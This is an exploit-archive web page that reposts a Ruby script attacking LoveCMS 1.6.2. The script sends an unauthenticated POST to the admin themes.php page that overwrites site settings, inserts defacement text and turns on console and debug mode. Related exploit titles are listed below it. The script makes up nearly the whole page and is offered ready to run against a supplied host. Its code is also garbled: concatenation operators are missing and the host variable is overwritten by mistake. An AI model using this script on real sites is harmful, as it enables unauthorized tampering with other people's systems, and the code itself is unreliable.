手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Update Settings Remote Exploit
LoveCMS 1.6.2 Final Update Settings Remote Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 3: changing site settings ...

##

## Description: Simply change the site settings !

##

## Usage: ./LoveCMS_3_settings.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

#

require 'net/http'

require 'uri'

@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'

@post_vars = {}

@post_vars['submit'] = 1

@post_vars['pagetitle'] = 'P4g3T1t1le'

@post_vars['sitename'] = 'SiteN4me'

@post_vars['slogan'] = 'By PoMdaPiMp.'

@post_vars['footer'] = 'PoMdaPiMp was here.'

@post_vars['description'] = 'Ruby is a gift.'

@post_vars['keywords'] = 'PoMdaPiMp, hack'

@post_vars['encoding'] = 'utf-8'

@post_vars['tips'] = 'off'

@post_vars['console'] = 'on'

@post_vars['debugmode'] = 'on'

@post_vars['module'] = 2

@post_vars['love_root'] = ''

@post_vars['love_url'] = ''

@host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : ''

if @host

# --

puts " LoveCMS Exploit Series. #3: Messing with settings."

puts

puts " : Attacking host: " @host

# --

# Changing settings

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),

@post_vars)

puts " :: Values set."

@post_vars.each do |k, v|

puts " " k.to_s " > " v.to_s

end

# --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Update Settings Remote Exploit】相关文章:

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

精品推荐
分类导航